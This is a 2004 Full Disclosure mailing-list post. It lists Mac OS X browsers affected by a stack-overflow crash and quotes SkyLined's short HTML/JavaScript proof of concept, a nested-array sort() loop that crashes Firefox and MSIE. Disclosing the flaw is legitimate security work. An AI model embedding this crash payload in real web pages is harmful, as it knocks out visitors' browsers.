Full Disclosure mailing list archives

More Browser flaws on MACOSX: nested array sort() loop Stack overflow exception

From: "Marco Mella" <marco.mella () telecomitalia it>
Date: Thu, 25 Nov 2004 17:44:11 +0100

Same problems on MACOSX 10.3.6 with:
-Safari 1.2.4
-Mozilla 1.7
-Camino 0.7.0
-Firefox 1.0
-Opera 6.0.3

Not affected IE 5.2.3

Regards
--
Marco

---------

  Hi all,

  Same flaw works for Firefox as well as MSIE:

  <HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT> <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  </HTML>

Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html

I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course "how to write a bug report" and go through all that bugzilla crap.

  Cheers,
  SkyLined
  http://www.edup.tudelft.nl/~bjwever

CONFIDENTIALITY NOTICE

This message and its attachments are addressed solely to the persons above and may contain confidential information. If
you have received the message in error, be informed that any use of the content hereof is prohibited. Please return it
immediately to the sender and delete the message. Should you have any questions, please contact us by replying to
webmaster () telecomitalia it.

       Thank you

                                       www.telecomitalia.it